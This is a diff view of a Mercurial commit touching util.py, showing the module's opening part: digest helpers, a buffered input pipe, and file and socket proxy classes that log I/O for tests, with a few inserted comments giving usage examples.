util: use a context manager in readlock()
Matt Harbison
r39941:4017968f default
@@ -1,3989 +1,3987 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still has deprecation warnings enabled by default. We do not
146 146 # want to display anything to the standard user, so detect if we are running
147 147 # tests and only use python deprecation warnings in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, the module name set through PYTHONWARNINGS is matched exactly, so
154 154 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS approach useless for our use case.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue a python-native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % key)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
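# Illustration (not part of the original file): a minimal sketch of using
# digestchecker to validate a stream. The size and digest values below are
# assumptions chosen for the example (md5 of b'foo').
#
#   >>> fh = bytesio(b'foo')
#   >>> d = digestchecker(fh, 3, {'md5': 'acbd18db4cc2f85cedef654fccc4a4d8'})
#   >>> while d.read(4096):
#   ...     pass
#   >>> d.validate()   # raises error.Abort on a size or digest mismatch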
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
277 277 _chunksize = 4096
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data is ready to read if it is already buffered.
285 285
286 286 This class lets us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True if any data is currently buffered
310 310
311 311 This will be used externally as a pre-step for polling IO. If there is
312 312 already data then no polling should be set in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if 1 < len(self._buffer):
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapses it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif 1 < len(self._buffer):
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if 1 < len(self._buffer):
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
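# Illustration (not part of the original file): a sketch of how
# bufferedinputpipe cooperates with polling. readline() is efficient, and
# hasbuffer tells the caller whether data is already buffered, in which
# case polling the fd first would be wrong.
#
#   >>> rfd, wfd = os.pipe()
#   >>> _ = os.write(wfd, b'a line\nmore')
#   >>> p = bufferedinputpipe(os.fdopen(rfd, r'rb'))
#   >>> p.readline()
#   'a line\n'
#   >>> p.hasbuffer    # b'more' is buffered; no need to poll before reading
#   True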
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
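# Illustration (not part of the original file): mmapread maps a whole file
# read-only and degrades to '' for empty files, which mmap itself rejects.
# The path below is hypothetical.
#
#   >>> with open(b'some-big-file', 'rb') as fp:
#   ...     data = mmapread(fp)  # buffer-like and sliceable, without a copy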
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed is a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_into', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792 792 self._writedata(data)
793 793
794 794 def write(self, res, data):
795 795 if not self.writes:
796 796 return
797 797
798 798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 799 # returns the integer bytes written.
800 800 if res is None and data:
801 801 res = len(data)
802 802
803 803 if self.logdataapis:
804 804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805 805
806 806 self._writedata(data)
807 807
808 808 def flush(self, res):
809 809 if not self.writes:
810 810 return
811 811
812 812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813 813
814 814 # For observedbufferedinputpipe.
815 815 def bufferedread(self, res, size):
816 816 if not self.reads:
817 817 return
818 818
819 819 if self.logdataapis:
820 820 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 821 self.name, size, len(res)))
822 822
823 823 self._writedata(res)
824 824
825 825 def bufferedreadline(self, res):
826 826 if not self.reads:
827 827 return
828 828
829 829 if self.logdataapis:
830 830 self.fh.write('%s> bufferedreadline() -> %d' % (
831 831 self.name, len(res)))
832 832
833 833 self._writedata(res)
834 834
835 835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 836 logdata=False, logdataapis=True):
837 837 """Turn a file object into a logging file object."""
838 838
839 839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 840 logdata=logdata, logdataapis=logdataapis)
841 841 return fileobjectproxy(fh, observer)
842 842
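# Illustration (not part of the original file): wrapping a file object so
# that every I/O call is logged, as the test suite does. `logfh' is an
# assumed open log handle and `fh' an assumed file object.
#
#   >>> proxy = makeloggingfileobject(logfh, fh, b'myfile', logdata=True)
#   >>> proxy.write(b'abc')   # logfh receives "myfile> write(3) -> 3: abc"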
843 843 class socketobserver(baseproxyobserver):
844 844 """Logs socket activity."""
845 845 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 846 logdata=False, logdataapis=True):
847 847 self.fh = fh
848 848 self.name = name
849 849 self.reads = reads
850 850 self.writes = writes
851 851 self.states = states
852 852 self.logdata = logdata
853 853 self.logdataapis = logdataapis
854 854
855 855 def makefile(self, res, mode=None, bufsize=None):
856 856 if not self.states:
857 857 return
858 858
859 859 self.fh.write('%s> makefile(%r, %r)\n' % (
860 860 self.name, mode, bufsize))
861 861
862 862 def recv(self, res, size, flags=0):
863 863 if not self.reads:
864 864 return
865 865
866 866 if self.logdataapis:
867 867 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 868 self.name, size, flags, len(res)))
869 869 self._writedata(res)
870 870
871 871 def recvfrom(self, res, size, flags=0):
872 872 if not self.reads:
873 873 return
874 874
875 875 if self.logdataapis:
876 876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 877 self.name, size, flags, len(res[0])))
878 878
879 879 self._writedata(res[0])
880 880
881 881 def recvfrom_into(self, res, buf, size, flags=0):
882 882 if not self.reads:
883 883 return
884 884
885 885 if self.logdataapis:
886 886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 887 self.name, size, flags, res[0]))
888 888
889 889 self._writedata(buf[0:res[0]])
890 890
891 891 def recv_into(self, res, buf, size=0, flags=0):
892 892 if not self.reads:
893 893 return
894 894
895 895 if self.logdataapis:
896 896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 897 self.name, size, flags, res))
898 898
899 899 self._writedata(buf[0:res])
900 900
901 901 def send(self, res, data, flags=0):
902 902 if not self.writes:
903 903 return
904 904
905 905 self.fh.write('%s> send(%d, %d) -> %d' % (
906 906 self.name, len(data), flags, len(res)))
907 907 self._writedata(data)
908 908
909 909 def sendall(self, res, data, flags=0):
910 910 if not self.writes:
911 911 return
912 912
913 913 if self.logdataapis:
914 914 # Returns None on success. So don't bother reporting return value.
915 915 self.fh.write('%s> sendall(%d, %d)' % (
916 916 self.name, len(data), flags))
917 917
918 918 self._writedata(data)
919 919
920 920 def sendto(self, res, data, flagsoraddress, address=None):
921 921 if not self.writes:
922 922 return
923 923
924 924 if address:
925 925 flags = flagsoraddress
926 926 else:
927 927 flags = 0
928 928
929 929 if self.logdataapis:
930 930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 931 self.name, len(data), flags, address, res))
932 932
933 933 self._writedata(data)
934 934
935 935 def setblocking(self, res, flag):
936 936 if not self.states:
937 937 return
938 938
939 939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940 940
941 941 def settimeout(self, res, value):
942 942 if not self.states:
943 943 return
944 944
945 945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946 946
947 947 def gettimeout(self, res):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952 952
953 953 def setsockopt(self, res, level, optname, value):
954 954 if not self.states:
955 955 return
956 956
